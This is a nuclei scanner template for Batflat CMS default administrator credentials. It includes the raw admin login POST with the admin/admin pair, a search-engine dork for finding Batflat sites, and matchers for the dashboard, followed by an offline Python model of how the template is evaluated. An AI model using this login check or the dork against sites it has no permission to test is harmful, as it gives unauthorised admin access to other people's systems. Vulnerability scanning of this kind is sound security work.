Vulnerability Description
Batflat CMS ships with pre-set (default) administrative credentials. If these are left unchanged, anyone who knows them can log in to the admin panel and access all configuration settings.
id: batflat-default-login

info:
  name: Batflat CMS - Default Login
  author: r3Y3r53
  severity: high
  description: |
    Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
  reference:
    - https://www.exploitalert.com/view-details.html?id=34749
    - https://cxsecurity.com/issue/WLB-2020010100
  classification:
    cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: batflat
    product: batflat
    google-query: intext:"Powered by Batflat."
  tags: default-login,batflat,vuln

http:
  - raw:
      - |
        POST /admin/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&login=

    attack: pitchfork
    payloads:
      username:
        - "admin"
      password:
        - "admin"

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Batflat - Dashboard")'
        condition: and
# digest: 4a0a00473045022004cdc59bb0f9d7f1b1d1923a0349e94cc7c214aca26c1177d8f7467a17d5c8ef022100e9ed6d473927f70729452707cc07a3d3aa3ba833e73c424cd2214706618edf6c:922c64590222798bb761d5b6d8e72950
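
To show how the template above is evaluated, the following added example (not part of the original template or of nuclei itself) models its `pitchfork` payload pairing and the three `and`-joined DSL matchers offline in Python. The host name and the sample responses are constructed for illustration, and the function names are hypothetical.

```python
from urllib.parse import urlencode

# Payload lists copied from the template above.
PAYLOADS = {"username": ["admin"], "password": ["admin"]}


def pitchfork(payloads):
    """Pair the i-th entry of every list, as 'attack: pitchfork' does."""
    keys = list(payloads)
    return [dict(zip(keys, combo)) for combo in zip(*payloads.values())]


def build_request(host, creds):
    """Render the template's raw POST for one credential pair (not sent)."""
    body = urlencode(creds) + "&login="
    return (
        "POST /admin/ HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "\r\n" + body
    )


def matches(status_code, content_type, body):
    """The three DSL matchers joined by 'condition: and'."""
    return (
        status_code == 200
        and "text/html" in content_type
        and "Batflat - Dashboard" in body
    )


# Constructed sample responses, as seen after redirects have been followed.
SAMPLES = {
    "default creds accepted": (200, "text/html; charset=utf-8",
                               "<title>Batflat - Dashboard</title>"),
    "login rejected": (200, "text/html; charset=utf-8",
                       "<p>constructed login-failed page</p>"),
    "redirect not followed": (302, "text/html", ""),
}

if __name__ == "__main__":
    for creds in pitchfork(PAYLOADS):  # one pair, hence max-request: 1
        print(build_request("cms.example.test", creds))
    for label, resp in SAMPLES.items():
        print(f"{label}: {'MATCH' if matches(*resp) else 'no match'}")
```

Because all three conditions must hold, a 200 response that merely re-renders the login form does not match; only a response whose body contains the dashboard title is reported.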